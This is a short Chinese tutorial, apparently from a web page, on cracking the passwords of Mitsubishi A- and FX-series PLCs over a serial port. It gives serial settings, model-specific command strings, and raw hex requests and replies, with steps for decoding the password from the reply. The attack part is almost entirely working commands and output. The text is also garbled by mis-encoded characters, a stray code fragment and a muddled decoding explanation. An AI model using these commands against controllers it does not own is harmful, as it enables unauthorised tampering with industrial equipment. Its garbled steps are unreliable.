1,使用串口調(diào)試器,設(shè)置好有關(guān)參數(shù)。
2,確定三菱PLC型號(hào),根據(jù)PLC型號(hào)選擇在串口調(diào)試器中輸入對(duì)應(yīng)字符串。
附:
PLC型號(hào) 對(duì)應(yīng)字符串
FX2 \STX0700808\ETX6A
FX2N \STX0300808\ETX66
FX2_EPROM \STX0800808\ETX6B
FXON/FXOX \STX0800808\ETX6B
FX1N/FX1X \STX0800808\ETX6B
3、發(fā)送后在接收框中將顯示一串字符串,如果你聰明的話一定會(huì)發(fā)現(xiàn)這些字符串的奧妙了。
(就是返回的密碼)
如果看不出來(lái)的話,將這些字符串拷貝到 HEX格式 中,發(fā)送一次看看。(發(fā)送前記得先斷開(kāi)PLC)
建議你自己設(shè)置一個(gè)密碼,然后用這個(gè)方法讀取一次看看,以后就知道是怎么回事了。
密碼字符:0-9,A-F。
4,舉例說(shuō)明破解A和FX系列PLC密碼:
A系列:
發(fā)送:A2 07 00 FF 02 05 AE 00 08 C3
接收:0B 00 FF 02 00 AA 77 55 BB EF CD AB A4 00
密碼:ABCDEF
發(fā)送:A2 07 00 FF 02 05 AE 00 08 C3
接收:0B 00 FF 02 00 AA 77 55 BB C1 B1 A1 A4
密碼:A1B1C1
分析:密碼為返回字符中BB至A4之間的字符,以每2字符為單位,從右往左讀出。 00E0202
FX系列:
設(shè)置串口:COM1,波特率:9600,數(shù)據(jù)位:7,校驗(yàn):E偶,停止位:1
輸入:EHX,顯示:ASC
發(fā)送:
02 30 38 30 30 38 30 38 03 36 42
返回一串16進(jìn)制的ASCII碼,30為數(shù)字0,31為數(shù)字1,01為A,02為B,以此類推;
例:02 30 38 30 30 38 30 38 03 36 42
\STX4236353433323130\ETX41
密碼是:B6543210 《42=B》
滬公網(wǎng)安備31010802001143號(hào)
